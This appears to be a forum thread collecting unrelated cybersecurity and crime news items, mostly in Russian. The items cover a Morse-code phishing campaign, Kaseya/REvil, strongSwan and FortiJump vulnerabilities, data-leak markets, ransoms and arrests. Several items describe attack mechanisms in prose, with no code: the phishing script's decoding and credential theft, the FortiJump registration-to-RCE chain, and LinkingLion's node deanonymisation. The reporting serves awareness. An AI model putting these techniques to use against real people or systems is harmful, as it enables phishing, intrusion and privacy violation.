Журналисты обнаружили на Reddit информацию о новой фишинговой кампании, которая использует азбуку Морзе для обфускации и сокрытия вредоносных URL-адресов во вложениях электронной почты. Проверяя эту информацию, специалисты издания обнаружили многочисленные образцы такой замаскированной малвари, загруженные на VirusTotal в феврале 2021 года.
Фишинговая атака начинается с электронного письма, замаскированного под инвойс и содержащего вложение, названное по шаблону «[название_компании]инвойс[номер]._xlsx.hTML». Вложение в формате HTML с таким названием выглядит как инвойс формате Excel.

При просмотре вложения в текстовом редакторе можно увидеть, что в его составе есть JavaScript, который сопоставляет буквы и цифры с азбукой Морзе. Например, буква «a» отображается как «.-», а буква «b» — это «-...».

Скрипт вызывает функцию decodeMorse() для декодирования морзянки в шестнадцатеричную систему, а полученная таким образом шестнадцатеричная строка затем преобразуется в теги JavaScript, которые вставляются в HTML-страницу.

Эти скрипты в сочетании с HTML-вложением содержат различные ресурсы, необходимые для отображения поддельного файла Excel, в котором пользователю сообщат, что время его сессии якобы истекло, и нужно ввести пароль еще раз. Если пользователь введет свои данные в предоставленную форму, они будут переданы на удаленный сайт, принадлежащий злоумышленникам. Издание отмечает, что для этого мошенники используют службу logo.clearbit.com (внедряет логотипы компаний-получателей в форму для входа, чтобы сделать ее более убедительной). Если логотип недоступен, используется общий логотип Office 365, как на скриншоте ниже.

По информации издания, таким направленным атакам уже подверглись как минимум одиннадцать компаний, включая SGS, Dimensional, Metrohm, SBI (Mauritius) Ltd, NUOVO IMAIE, Bridgestone, Cargeas, ODDO BHF Asset Management, Dea Capital, Equinti и Capital Four.
Теперь молодому человеку грозит огромный срок за свои преступления.
Министерство юстиции США объявило об аресте подозреваемого, когда прокурор США Дамиан Уильямс предъявил обвинения в федеральном суде Нью-Йорка 23-летнему Фостеру Кули из Аризоны. По словам Уильямса, Кули участвовал в схеме по взлому точек сети парикмахерских и краже более $400 000, которые должны были прийти на счет компании-жертвы, но отправлялись злоумышленникам. Преступления молодого человека какое-то время оставались нераскрытыми, так как он со своими подельниками воровал деньги, не заходя ни в один из салонов.
Кули обвиняется в использовании вредоносного ПО для кражи логинов и паролей, принадлежащих сотрудникам парикмахерской фирмы, которая имеет салоны в Нью- Йорке, Нью-Джерси и Колорадо. Получив нужную информацию, преступник использовал ее для получения доступа к кредитным картам филиалов, которые были сохранены в интернет-браузерах жертв.
Имея доступ к кредитным картам филиалов, Кули изменил банковские счета, перенаправляя все платежи от клиентов парикмахерской фирмы на счета, контролируемые им самим и его сообщниками.
Кули был арестован в ходе операции ФБР и сейчас ему предъявлены серьезные уголовные обвинения за его киберпреступления: по единственному пункту предъявленного ему обвинения в мошенничестве с использованием электронных средств коммуникации максимальный срок составляет 20 лет, а за причинение ущерба защищенному компьютеру путем мошенничества максимальный срок заключения составляет 10 лет.
The outgoing week turned out to be very eventful in the world of information
security - massive attacks by the REvil ransomware, attacks by APT groups,
hacking of the National Committee of the Republican Party and an attack on the
social network of Donald Trump's supporters are only a small fraction of the
security incidents of the outgoing week.
Read about these and other events for the period from 3 to 9 July 2021 in our review. About two hundred American companies were affected by a cyberattack on Florida-based IT company Kaseya, which provides IT infrastructure management services.
Experts believe that the organizer of the attack is the extortionist group REvil. According to experts, Kaseya fell victim to ransomware, which then spread across corporate networks of companies using Kaseya software, in particular the Virtual System Administrator (VSA) tool. Hackers demand from victims a ransom of $ 45 thousand in cryptocurrency.
According to experts from the Dutch non-profit organization DIVD (Dutch Institute for Vulnerability Disclosure), the attackers exploited a previously unknown vulnerability in the Kaseya VSA server. According to DIVD head Victor Gevers, Kaseya was in the process of patching a vulnerability (CVE-2021-30116) when it came under attack. As it turned out, this vulnerability was reported to the company back in April of this year, but the patch for it was not prepared in time.
Cybersecurity researchers at Huntress Labs have successfully replicated an exploit used in attacks against Kaseya and its customers. Researchers were able to reproduce the attack and demonstrate a chain of exploits allegedly used by cybercriminals. The exploit includes bypassing authentication, uploading arbitrary files, and command injection.
One of the victims of the attack on Kaseya was Coop, a large supermarket chain in Sweden, which had to close about 800 stores across the country due to one of the contractors affected by the REvil ransomware attack on Kaseya.
Cyber fraudsters are taking advantage of the critical situation that has developed around attacks on Kaseya and its clients. Attackers send spam emails to potential victims with a Cobalt Strike payload disguised as security updates for the Kaseya VSA. Criminals are sending emails to potential victims with a malicious attachment and an embedded link that looks like a patch from Microsoft for a zero-day vulnerability in Kaseya VSA, exploited by operators of the ransomware REvil. When a victim launches a malicious attachment or downloads and runs a fake Microsoft patch, attackers gain permanent remote access to their computer.
Another high-profile event of the week is the potential hack of the National Committee of the US Republican Party. The attack is behind the well-known cybercriminal group APT 29, also known as Cozy Bear, which is believed to be responsible for the 2016 Democratic National Committee breach and the SolarWinds attack.
Cybersecurity researchers have discovered a new phishing campaign targeting engineering candidates in the United States and Europe. According to the researchers, the malware campaign is organized by the Lazarus APT group and has been active over the past several months. The hackers distributed documents disguised as letters from defense contractors and engineering companies such as Airbus, General Motors (GM), and Rheinmetall. All emails contain malicious documents.
Another APT group, SideCopy, is targeting government officials in India. SideCopy has been in operation since at least 2018 and has developed new remote access Trojans, some of which use plugins to add additional functionality.
One of the largest cyberattacks in the past few years took place in Poland, as a result of which the e-mails of about a dozen members of the Polish parliament were hacked. The incident affected representatives of almost all opposition factions in parliament. All victims were notified of the incident and received training on cyber security.
Unknown attackers hacked the recently launched social network GETTR for Donald Trump supporters, stole personal information of about 90 thousand users and published it on a hacker forum. Hackers discovered an insecure application programming interface (API) that allowed them to steal data from 87,973 GETTR users, including email addresses, aliases, profile names, year of birth, profile descriptions, avatar URL, background images, location, personal website and other internal site data.
An error in the software of the Madrid medical regulator has led to the leakage of personal information of thousands of residents of the Spanish capital. Among those whose personal information was revealed are the king of Spain Philip VI living in the region, Prime Minister Pedro Sanchez and other politicians.
The victim of a cyberattack using ransomware was the Washington Suburban Sanitary Commission (WSSC Water). The attackers managed to gain access to the internal files of WSSC Water, but no manipulations with the tap water were recorded.
Доступен выпуск strongSwan 5.9.10, свободного пакета для создания VPN-соединений на базе протокола IPSec, используемого в Linux, Android, FreeBSD и macOS. В новой версии устранена опасная [уязвимость](https://www.strongswan.org/blog/2023/03/02/strongswan- vulnerability-(cve-2023-26463).html) ([CVE-2023-26463](https://security- tracker.debian.org/tracker/CVE-2023-26463)), которая может быть использована для обхода аутентификации, но потенциально также может привести к выполнению кода атакующего на стороне сервера или клиента. Проблема проявляется при проверке специально оформленных сертификатов в методах аутентификации EAP (Extensible Authentication Protocol) на базе TLS.
Уязвимость вызвана тем, что TLS-обработчик некорректно принимает открытые ключи из сертификата соседнего узла (peer), считая их заслуживающими доверия, даже если сертификат не может быть успешно верифицирован. В частности, при вызове функции tls_find_public_key(), для определения заслуживающих доверия сертификатов, используется выборка на основе типа открытого ключа. Проблема в том, что переменная, используемая для определения типа ключа для операции поиска, выставляется в любом случае, даже если сертификат не заслуживает доверия.
Более того, через манипуляцию с ключом можно добиться уменьшения счётчика ссылок (если сертификат не заслуживает доверия, ссылка на объект освобождается после определения типа ключа) и освобождения памяти под ещё используемый объект с ключом. Рассмотренная недоработка не исключает создание эксплоитов для организации утечки информации из памяти и выполнения своего кода.
Атака на сервер осуществляется через отправку клиентом самоподписанного сертификата для аутентификации клиента с использованием методов EAP-TLS, EAP- TTLS, EAP-PEAP и EAP-TNC. Атака на клиента может быть совершена через возвращение сервером специально оформленного сертификата. Узвимость проявляется в выпусках strongSwan 5.9.8 и 5.9.9.
Международный аэропорт Мумбаи в Индии получил анонимное письмо. Террорист угрожает взорвать терминал 2 в течение 48 часов, если он не получит выкуп в размере $1 млн в биткоинах, сообщает ANI со ссылкой на данные правоохранительных органов.
Согласно заявлению полиции, неизвестный отправил на электронную почту аэропорта письмо со следующим содержанием:
«Мы взорвем Терминал 2 в течение 48 часов, если на этот адрес не будет переведен миллион долларов в биткоинах. Еще одно предупреждение будет через 24 часа».
Данную информацию подтвердил исполнительный директор аэропорта Мумбаи Висмей
Патхак.
В заявлении говорится, что сотрудникам полиции удалось отследить адрес
интернет-протокола, который использовался для отправки письма с угрозой. На
основании полученной информации правоохранительные органы Мумбаи и власти
аэропорта проводят дальнейшее расследование.
Один из трех операторов сайта WeLeakInfo, который продавал всем желающим доступ к различным утечкам данных, приговорен в Нидерландах к двум годам тюремного заключения, хотя второй год он будет отбывать условно.
Во время судебного заседания, которое состоялось в начале текущего года, подозреваемый (23-летний мужчина, чье имя не разглашается), признался, что руководил сервисом вместе с выходцем из Северной Ирландии и третьим неустановленным лицом, которое все еще остается на свободе.
Эти трое администрировали сервис, который продавал доступ к данным более чем 12,5 миллиардов учетных записей, собранных из 10 000 различных утечек. Фактически за плату сайт предоставлял доступ паролям людей открытым текстом. При этом сам доступ стоил всего 2 доллара в день (7 долларов в неделю или 24 долларов в месяц).
Хотя сайт пытался маскироваться под законный сервис (вроде Have I Been Pwned), на самом деле его активно рекламировали на хакерских формах, как ресурс, где можно найти старые учетные данные людей. Эта информация затем могла использоваться для попыток для взлома разных профилей жертвы, в надежде, что та повторно использовала одни те же пароли.
23-летний житель Голландии рассказал следователям, что он не создавал сайт, а лишь присоединился к команде WeLeakInfo в начале 2016 года, когда ресурс уже работал. Якобы подозреваемый из Северной Ирландии писал сам сайт, а третий неизвестный отмывал платежи, поступающие от клиентов. Осужденный же «в основном занимался обработкой данных, а также отвечал на вопросы в службу поддержки».
Он рассказывает, что обрабатывал взломанные БД и загружал их на серверы WeLeakInfo. Причем большая часть данных была предоставлена ресурсу «в виде пожертвований». То есть схема, в рамках которой пользователям давали бесплатный доступ к сервису, если те предоставили WeLeakInfo новую БД, отлично работала.
Напомню, что в начале 2020 года произошло изъятие домена WeLeakInfo.com, и это было результатом совместной операции ФБР, а также правоохранителей из Северной Ирландии, Нидерландов, Германии и Великобритании. Уже после захвата домена в Нидерландах и Северной Ирландии, были арестованы двое мужчин, которые управляли ресурсом.
Как стало известно теперь, благодаря судебным документам, за несколько дней до ареста админы обменялись сообщениями в WhatsApp и обсуждали получение судебного запроса от ФБР. Судя по логам, двое подозреваемых считали, что они в безопасности, так как власти не отправляли запросы на подпольные маркетплейсы, в итоге операторы WeLeakInfo полагали, что ФБР считает их «законными».
• Source: https://uitspraken.rechtspraak.nl/inziendocument?id=ECLI:NL:RBMNE:2021:1877
REvil в Швеции
Случайно нашёл на гитхабе

Professionals Responding to the REvil Ransomware Kaseya Supply Chain Attack ](https://github.com/cado-security/DFIR_Resources_REvil_Kaseya)
Resources for DFIR Professionals Responding to the REvil Ransomware Kaseya Supply Chain Attack - cado-security/DFIR_Resources_REvil_Kaseya
github.com
В Telegram распространяется база с данными о 7,8 млн операций пользователей сервиса SMS-activate, пишут «Известия» со ссылкой на сервис разведки утечек данных и мониторинга даркнета DLBI. В ней содержатся в том числе частичные номера карт клиентов, банки-эмитенты и сроки действия карт, а также информация примерно о 160 тыс. уникальных почтовых адресов.
16 июля в Telegram-каналах начала распространяться база данных об операциях в SMS-activate. В текстовом документе содержится 7,8 млн записей о трансакциях по оплате услуг сервиса на 89 млн строк. В каждой из них есть информация о сумме операции, дате проведения, электронной почте, а также о первых шести и последних четырех цифрах номера карты, платежной системе, банке-эмитенте и сроке действия «пластика». Согласно файлу, ряд операций проводились через электронные кошельки.
По данным на сайте SMS-activate, он предоставляет виртуальные номера для приема СМС со всего мира. С помощью портала можно создать аккаунт для любого сервиса или приложения. Как пояснил один из клиентов SMS-activate, для того чтобы воспользоваться услугой, нужно, заплатив, выбрать страну и получить номер телефона для регистрации на каком-то портале или в мессенджере. Это нужно, например, чтобы человек мог завести дополнительный аккаунт в соцсети, если его номер уже зарегистрирован на другой странице.
По словам основателя сервиса разведки утечек данных и мониторинга даркнета DLBI Ашота Оганесяна, сообщение о сливе базы данных перепостили около 15 Telegram-каналов, связанных с информационной безопасностью. Он отметил, что днем 19 июля база по-прежнему была доступна для скачивания. Эксперт добавил, что принадлежность сведений сервису SMS-activate подтверждается самим содержимым файла.
С большой долей вероятности утечка произошла из-за того, что лог-файл лежал в открытом доступе среди другой информации сайта и был доступен по прямой ссылке, предположил Оганесян. Он уточнил, что в файле содержится более 163 тыс. уникальных адресов электронных почт клиентов, однако из них валидных всего около 50 тыс. При этом говорить, данные скольких россиян были скомпрометированы, сложно, добавил эксперт. По словам руководителя блока специальных сервисов Infosecurity a Softline company Сергея Трухачева, в пользу подлинности базы говорит тот факт, что она слишком большая, а ее формат не похож на компиляцию из других источников. Он подчеркнул, что утекшие сведения весьма критичны: среди них, в частности, имеются персональные данные клиентов, информация об их IP-адресах, геопозиции, используемых платежных средствах и т. д. Сведения могли оказаться в открытом доступе из-за низкой защищенности данных и невнимательного отношения к вопросам обработки чувствительной информации на сайте, считает эксперт. По его словам, эти сведения могут использовать злоумышленники.
• Source: [https://iz.ru/1195267/natalia-ilina...e-o-78-mln-platezhnykh- operatcii-sms-activate](https://iz.ru/1195267/natalia-ilina/vyrastili-slivy- utekli-dannye-o-78-mln-platezhnykh-operatcii-sms-activate)
В американском городе Санта-Роза (штат Калифорния) задержали кардера, промышлявшего кражами и подделкой банковских карт, чеков и почты и дальнейшим мошенничеством с ними. Как уточняет портал KRON4, арест стал следствием случайности: местные жители увидели молодого человека без сознания в припаркованном автомобиле на территории частного участка.
К моменту приезда помощников шерифа 26-летний Бенджамин Улисс Брасс (Benjamin Ulysses Brass) уже пришел в себя, но дверь полицейским открыть отказался. Что не удивительно: у него не было при себе удостоверения личности, зато были наркотики в крови.
Уже после задержания машину обыскали, в ней нашли ноутбук, переносной принтер, инструменты для подделки чеков, украденную почту и чеки, 18 дебетовых карт с именем подозреваемого, восемь — с чужими именами и еще семь — без тиснения. Еще более интересная находка ждала силовиков в базах данных: выяснилось, что Брасс находится на двухлетнем испытательном сроке сразу по четырем отдельным уголовным делам, также связанным с кардингом. В заключении он провел всего восемь месяцев и вышел на свободу в 2021 году.
В итоге Брасс был взят под стражу и заключен в тюрьму по подозрению в краже личных данных и нарушении правил условно-досрочного освобождения. Суд не рассматривал вариант с внесением залога, расследование продолжается.
source: kron4.com/news/bay-area/felon-found-with-stolen-debit-cards-mail-in- santa-rosa
Cellebrite makes software to automate physically extracting and indexing data from mobile devices. They exist within the grey – where enterprise branding joins together with the larcenous to be called “digital intelligence.” Their customer list has included authoritarian regimes in Belarus, Russia, Venezuela, and China; death squads in Bangladesh; military juntas in Myanmar; and those seeking to abuse and oppress in Turkey, UAE, and elsewhere. A few months ago, they announced that they added Signal support to their software.

from an app's perspective ](https://signal.org/blog/cellebrite- vulnerabilities/)
Cellebrite makes software to automate physically extracting and indexing data from mobile devices. They exist within the grey – where enterprise branding joins together with the larcenous to be called “digital intelligence.” Their customer list has included authoritarian regimes in Belarus, Russi...
signal.org
Для привлечения аудитории администраторы бесплатно раздают личные данные миллионов пользователей
Недавно запущенный кардинговый сайт под названием «BidenCash» продаёт данные кредитных карт и информацию об их владельцах. Платформа была создана в конце апреля, но имеет небольшое количество данных, поскольку инфраструктура сайта не готова к крупномасштабным операциям.
16 июня администраторы BidenCash для продвижения своей платформы решили бесплатно раздать CSV-файл, содержащий следующие данные:
Имена;
Адреса;
Номера телефонов;
Адреса электронной почты;
Номера кредитных карт.

Всего в файле около 8 млн. строк. По данным итальянской ИБ-компании D3Lab , в базе данных содержится информация о 6600 кредитных карт. Также база включает в себя более 3 млн. адресов электронной почты, которые могут быть использованы для фишинга и захвата учетных записей.
Исследователи выяснили, что на сайте киберпреступник может купить данные кредитных карт по $0,15. BidenCash включает в себя систему фильтрации поиска по следующим показателям:
страна;
банк;
CVV-код;
email-адрес;
тип карты;
владелец карты.

Держателю карты следует обращать внимание на списание средств и сообщать банку
о любых подозрительных действиях. Установка ограничений на оплату является
хорошим способом предотвратить использование украденных карт
киберпреступником.
Банки сейчас предлагают виртуальную карту, которую пользователь может легко
закрыть. Также существует одноразовая карта, которая автоматически закрывается
после совершения одной покупки. Использование многофакторной аутентификации
также поможет защитить учетную запись онлайн-банка.
source: d3lab.net/bidencash-another-credit-card-market-publishes-data-for-free
Как показало внутреннее расследование CNA, группировка Phoenix не попадает под действие санкций правительства США.
Одна из крупнейших в США страховых компаний CNA заплатила хакерам $40 млн за восстановление доступа к своим сетям после атаки вымогательского ПО.
Напомним , 21 марта нынешнего года CNA стала жертвой программы-вымогателя Phoenix CryptoLocker, зашифровавшей 15 тыс. устройств в ее сети. Как изданию Bloomberg сообщили осведомленные источники, пожелавшие сохранить инкогнито, страховщик заплатил вымогателям выкуп через две недели после атаки.
В пресс-службе CNA заявили, что компания действует в соответствии с законом. По словам пресс-секретаря, страховщик проконсультировался с ФБР и Управлением по контролю за иностранными активами (OFAC) Министерства финансов США и передал им все необходимые данные об атаке и хакерах. В октябре прошлого года Минфин опубликовал руководство для жертв программ-вымогателей по уплате выкупа и пояснил, что делать, если уплата выкупа может стать нарушением санкций.
«CNA не комментирует выкуп. CNA выполняет все требования законов, указов и руководств, в том числе руководства OFAC от 2020 года по вымогательскому ПО»,
Компания CNA, в том числе предлагающая своим клиентам страхование киберрисков, заявила, что, как показало ее внутреннее расследование, киберпреступная группировка Phoenix не попадает под действие санкций правительства США.
Сообщение об уплате CNA выкупа хакерам, вероятно, вызовет гнев законодателей и регулирующих органов, уже недовольных тем, что американские компании платят большие суммы киберпреступникам, за последний год атаковавшим больницы, производителей лекарств, полицию и другие организации, критически важные для общественной безопасности. ФБР не рекомендует организациям платить выкуп, поскольку это поощряет дополнительные атаки и не гарантирует возврата данных.
[0xB10C](https://cointelegraph.com/news/mysterious-entity-may-be-collecting- btc-users-ip-addresses-bitcoin-developer): Некто пытается деанонимизировать адреса всех биткоин-кошельков
По информации разработчика приложений сети Биткоина под псевдонимом 0xB10C, конфиденциальность персональных данных владельцев BTC-кошельков находится под угрозой.
Частное лицо или группа, объединенная под именем LinkingLion собирает данные о владельцах биткоинов с марта 2018 года и уже использовал(-овала) более 800 различных IP-адресов, чтобы скрыть свою деятельность, рассказывает 0xB10C.
LinkingLion устанавливает TCP-соединение с биткоин-узлом и запускает подтверждение версии, отправляя сообщение: version. Сообщения о версии имеют неясные пользовательские агенты, такие как, например, /bitcoinj:0.14.3/Bitcoin Wallet:4.72/, /Classic:1.3.4(EB8)/или /Satoshi:0.13.2/. Всего LinkingLion использовал 118 различных пользовательских агентов. Почти все они появляются в сообщениях о версии с одинаковой частотой. То есть пользовательские агенты выбираются из списка и, вероятно, являются поддельными.
«LinkingLion открывает соединения со многими узлами сети Биткоина, используя четыре диапазона IP-адресов, и прослушивает объявления о транзакциях. Использует IP-адреса из трех диапазонов IPv4/24 и одного диапазона IPv6/32 для подключения к прослушивающим узлам в сети Биткоин. Это может позволить LinkingLion связать новые широковещательные транзакции с IP-адресами узлов. Такое поведение может указывать на то, что неизвестный/ные пытается определить, доступен ли конкретный узел по конкретному IP-адресу. Все эти диапазоны IP-адресов объявлены AS54098, LionLink Networks», — пишет 0xB10C.
На основании информации реестра ARIN и RIPE, диапазоны принадлежат разным компаниям: Fork Networking, Castle VPN, Linama UAB и Data Canopys.
Fork Networking и Castle VPN — это американские компании, принадлежащие одному и тому же владельцу. Fork Networking предлагает услуги хостинга и колокации, а Castle VPN — VPN-провайдер. Linama UAB — литовская компания, не представленная в Интернете. Data Canopy — американская компания, предлагающая облачные и колокационные центры обработки данных. Поскольку подключения из этих диапазонов IP-адресов имеют очень похожее поведение, 0xB10C предположил, что они контролируются или арендуются LinkingLion.
Примерно в 15% случаев LinkingLion не сразу закрывает соединение. Вместо этого либо прослушивает сообщения инвентаризации, содержащие транзакции, либо отправляет запрос адреса и прослушивает как сообщения инвентаризации, так и адресные сообщения. Затем закрывает соединение в течение десяти минут.
Информация, которую LinkingLion получает от узла, может быть разделена на метаданные, инвентарь и адреса. Все соединения узнают о метаданных узла, которые включают в себя информацию о том, когда узел доступен или недоступен, какая версия программного обеспечения работает на этом конкретном узле и когда он обновляется, какую высоту блока считает лучшей и когда она меняется, какие услуги предлагает узел.
0xB10C предположил, что таким образом LinkingLion может записывать синхронизацию транзакций, чтобы определить, какой узел первым получил транзакцию. Затем эту информацию можно использовать для определения IP-адреса, связанного с конкретным биткоин-адресом. Согласно 0xB10C, LinkingLion может использовать эту информацию для привязки широковещательных транзакций непосредственно к IP-адресам.
0xB10C обращает внимание разработчиков, что LinkingLion может попытаться обойти список запретов, изменив IP-адреса, которые в настоящее время использует для подключения. Краткосрочной профилактикой может быть ручной запрет диапазонов IP-адресов, используемых LinkingLion для входящих подключений к узлам. По мнению 0xB10C, единственным постоянным решением проблемы может стать изменение логики транзакций в Bitcoin Core.
Оперативники уголовного розыска УВД по СЗАО ГУ МВД России по г. Москве совместно с коллегами из района Строгино г. Москвы задержали четверых подозреваемых в мошенничестве.
Предварительно установлено, что злоумышленники использовали методы социальной инженерии, чтобы продавать через Интернет обучающие курсы по инвестированию. Они обещали, что их уникальные методики позволят получать высокий доход от вложений в недвижимость.
«Однако на самом деле клиентам предлагали найденную в Глобальной сети общедоступную информацию, часть которой уже потеряла актуальность. Возвращать деньги за проданные образовательные программы аферисты отказывались.
Следователем Следственного отдела ОМВД России по району Строгино г. Москвы возбуждено уголовное дело по признакам преступления, предусмотренного частью 4 статьи 159 УК РФ. Фигурантам избрана мера пресечения в виде заключения под стражу», – сообщила официальный представитель МВД России Ирина Волк.
На этой неделе системные администраторы и СМИ обвинили Fortinet в том, что компания больше недели скрывала информацию о критической уязвимости в API FortiManager. При этом пользователи писали, что хакеры уже используют уязвимость для атак и выполнения вредоносного кода на серверах. В итоге в компании признали существование проблемы.
Первые сообщения о некой критической уязвимости в FortiManager, который используется для управления трафиком и устройствами в сетях организаций, начали появляться в сети еще на прошлой неделе.
При этом некоторые администраторы писали, что получили электронные письма от компании с уведомлением о доступных обновлениях, а другие уверяли, что им ничего подобного не приходило. Третьи утверждали, что их организацию вообще взломали «за несколько недель до появления уведомлений». А разработчики при этом не публиковали никаких официальных заявлений, не раскрывали индикаторов CVE и в целом хранили молчание.
Как рассказал известный ИБ-эксперт [Кевин Бомонт](https://doublepulsar.com/burning-zero-days-fortijump-fortimanager- vulnerability-used-by-nation-state-in-espionage-via-msps-c79abec59773) (Kevin Beaumont), об уязвимости стало известно как минимум 13 октября 2024 года, и проблема связана с конфигурацией FortiManager по умолчанию, которая позволяет зарегистрировать в панели управления FortiManager устройства с неизвестными или неавторизованными серийными номерами. Эксперт дал 0-day проблеме название FortiJump.
Пользователи на Reddit так же предупреждали, что это 0-day уязвимость, которая позволяет злоумышленникам «похитить сертификат Fortigate из любого Fortigate, зарегистрироваться в FortiManager и получить к нему доступ».
«Люди на Reddit открыто пишут о том, что сейчас происходит, — сообщал Бомонт. — Злоумышленники регистрируют фальшивые FortiGate в FortiManager с именами хостов вроде “localhost” и используют их для RCE [удаленного выполнения кода]».
Click to expand...
Исследователь заявил, что, судя по найденным им доказательствам, китайские «правительственные» хакеры эксплуатировали эту проблему с начала 2024 года для взлома внутренних сетей организаций.
По его словам, корень проблемы крылся в протоколе FortiGate to FortiManager (FGFM), который позволяет устройствам Fortigate взаимодействовать с менеджером через порт 541. Бомонт отмечал, что поисковик Shodan обнаруживает в интернете более 60 000 доступных подключений такого рода.
[](https://xakep.ru/wp- content/uploads/2024/10/487382/shodan-fortimanager-1536x939-1.jpg)
«Злоумышленникам нужно соблюсти одно условие: для подключения необходим действующий сертификат. Однако можно просто взять сертификат устройства FortiGate и использовать его повторно. То есть, по сути, никаких ограничений для регистрации нет.
После регистрации существует уязвимость, позволяющая удаленно выполнить код в самом FortiManager через несанкционированное FortiGate-подключение.
Из FortiManager можно управлять легитимными нижестоящими брандмауэрами FortiGate, просматривать файлы конфигурации, извлекать учетные данные и изменять настройки. Поскольку MSP (поставщики управляемых услуг) часто используют FortiManager, можно использовать его для проникновения в последующие внутренние сети клиентов.
В силу того, как устроен FGFM (ситуации с обходом NAT), это также означает, что получив доступ к управляемому брандмауэру FortiGate, можно перейти к управляющему устройству FortiManager, а затем к другим брандмауэрам и сетям», — объяснял Бомонт.Click to expand...
Только спустя еще несколько дней после появления этих сообщений и предупреждений представители Fortinet наконец опубликовали официальную информацию о проблеме FortiJump, которая получила идентификатор CVE-2024-47575 (9,8 балла по шкале CVSS). При этом в компании подтвердили, что уведомляли пользователей FortiManager о проблеме в частном порядке, начиная с 13 октября 2024 года.
«Уязвимость отсутствия аутентификации для критической функций [CWE-306] в демоне FortiManager fgfmd позволяет удаленному неаутентифицированному злоумышленнику выполнять произвольный код или команды с помощью специально подготовленных запросов, — сообщили в компании. — По имеющимся данным, эта уязвимость уже могла использоваться в реальных атаках».
Click to expand...
По словам представителей Fortinet, с помощью FortiJump злоумышленники похищали различные файлы с серверов FortiManager, которые «содержали IP-адреса, учетные данные и конфигурации управляемых устройств».
В компании подчеркнули, что на данном этапе никаких доказательств установки вредоносного ПО в скомпрометированные сервисы FortiManager или изменения настроек FortiGate не обнаружено.
При этом в бюллетене компании не упоминается тот факт, что перед атакой злоумышленники сначала должны получить действительный сертификат для любых устройств Fortinet, включая FortiManager VM. Такие сертификаты используются создания SSL-туннеля между FortiGate и сервером FortiManager и аутентификации обоих устройств.
Согласно официальным данным, проблема затрагивает следующие версии FortiManager:
Версия| Уязвимые версии| Исправление
---|---|---
FortiManager 7.6| 7.6.0| Обновиться до версии 7.6.1 или выше
FortiManager 7.4| 7.4.0 — 7.4.4| Обновиться до версии 7.4.5 или выше
FortiManager 7.2| 7.2.0 — 7.2.7| Обновиться до версии 7.2.8 или выше
FortiManager 7.0| 7.0.0 — 7.0.12| Обновиться до версии 7.0.13 или выше
FortiManager 6.4| 6.4.0 по 6.4.14| Обновиться до версии 6.4.15 или выше
FortiManager 6.2| 6.2.0 — 6.2.12| Обновиться до версии 6.2.13 или выше
FortiManager Cloud 7.6| Не затронуто| Не нужно
FortiManager Cloud 7.4| 7.4.1 — 7.4.4| Обновиться до версии 7.4.5 или выше
FortiManager Cloud 7.2| 7.2.1 — 7.2.7| Обновиться до версии 7.2.8 или выше
FortiManager Cloud 7.0| 7.0.1 по 7.0.12| Обновиться до версии 7.0.13 или выше
FortiManager Cloud 6.4| 6.4 все версии| Перейти на исправленную версию
При этом пока из исправленных версий вышли только FortiManager 7.2.8 и 7.4.5, а остальные должны быть выпущены в ближайшие дни.
Как отмечает издание Bleeping Computer, по данным неназванного знакомого с проблемой источника, суть CVE-2024-47575 связана даже не с упомянутыми выше сертификатами, ведь API FortiManager FGFM имеет дополнительный уровень авторизации. Проблема в том, что FortiJump позволяет обойти эту аутентификацию в API. И этот API дает злоумышленникам возможность выполнять команды, похищать данные и захватывать полный контроль над управляемыми устройствами и FortiManager для дальнейшего развития атаки.
В связи с конфиденциальным характером вероятно украденных у пострадавших данных, представители Fortinet настоятельно рекомендовали администраторам изменить пароли и конфиденциальные данные пользователей, на всех управляемых устройствах.
При этом в компании не приводят никаких подробностей о возможном количестве атак и пострадавших клиентов, а также не связывают происходящее с каким-либо конкретными хак-группами, ссылаясь на то, что расследование еще продолжается.
Зато аналитики компании [Mandiant](https://cloud.google.com/blog/topics/threat- intelligence/fortimanager-zero-day-exploitation-cve-2024-47575?e=48754805) уже сообщили, что, по их информации, проблема FortiJump использовалась злоумышленниками из хак-группы UNC5820 с июня 2024 года, и от действий хакеров пострадали более 50 серверов. Поскольку после этих атак хакеры не предпринимали никаких последующих действий, специалистам Mandiant не удалось определить их цели и возможное местонахождение.
[](https://xakep.ru/wp- content/uploads/2024/10/487382/fortinet-zero-day- fig2_max-600x6-1.jpg)FortiManager VM под контролем злоумышленников
Из-за неразберихи, образовавшейся вокруг раскрытия уязвимости, клиенты Fortinet, ИБ-специалисты и СМИ активно активно критикуют действия компании. Как уже упоминалось выше, некоторые пользователи FortiManager вообще не получали предварительных уведомлений об уязвимости и были вынуждены узнавать подробности о 0-day баге из обрывочных сведений, просочившихся в сеть.
Другие пользователи критикуют компанию за что, что приватном письме не сообщалось о том, что FortiManager Cloud тоже затронут проблемой CVE-2024-47575, однако по телефону специалисты технической поддержки Fortinet сообщали, что продукт тоже уязвим.
В целом критика в адрес компании сводится к тому, что Fortinet в очередной раз пытается полагаться на принцип «безопасность через неясность» (Security through obscurity), как уже неоднократно делала в прошлом.
К примеру, в 2022 году компания тихо исправила находящуюся под атаками уязвимость в FortiOS SSL-VPN (CVE-2022-42475), не сообщив публично, что та уже используется хакерам. Тогда компания точно так же выпустила приватное сообщение для клиентов, предупреждавшее об этой ошибке.
В другом случае, в 2023 году, разработчики Fortinet по-тихому устранили другую критическую уязвимость в FortiGate SSL-VPN (CVE-2023-27997), связанную с удаленным выполнением кода. И только несколько дней спустя, в компании признали, что это проблема использовалась как 0-day в атаках на правительственные учреждения, производственные предприятия и объекты КИИ.
Теперь многие вспоминают еще и о том, что в мае текущего года директор Fortinet по информационной безопасности Карл Виндзор (Carl Windsor), [заявлял](https://www.fortinet.com/blog/psirt-blogs/proactive-responsible- disclosure-is-one-cucial-way-fortinet-strengthens-customer-security):
«Мы давно придерживаемся принципов ответственной радикальной прозрачности, которые включают в себя активное соблюдение высочайших стандартов ответственного раскрытия информации [об уязвимостях], соответствующих международным и отраслевым практикам».
Click to expand...
В Одессе судили программиста, который приобрел два пакета каннабиса, и попался правоохранителям, когда забрал наркотик из тайника.
Согласно материалам дела, после того, как программист. забрал «товар» в тайнике на улице Тульской, 88, и положил наркотик себе в пишеню, его остановили сотрудниками полиции, которые изъяли 20,2 грамма запрещенного вещества. Программист их незаконно хранил при себе для личного употребления, без цели сбыта.
Он искренне раскаялся и признал свою вину. Суд первой инстанции вынес мужчине приговор, согласно которому он получил два года ограничения свободы. Однако программист подал апелляцию, чтобы наказание изменить.
Суд апелляцию удовлетворил и назначил мужчине наказание в виде штрафа в размере 17000 грн.
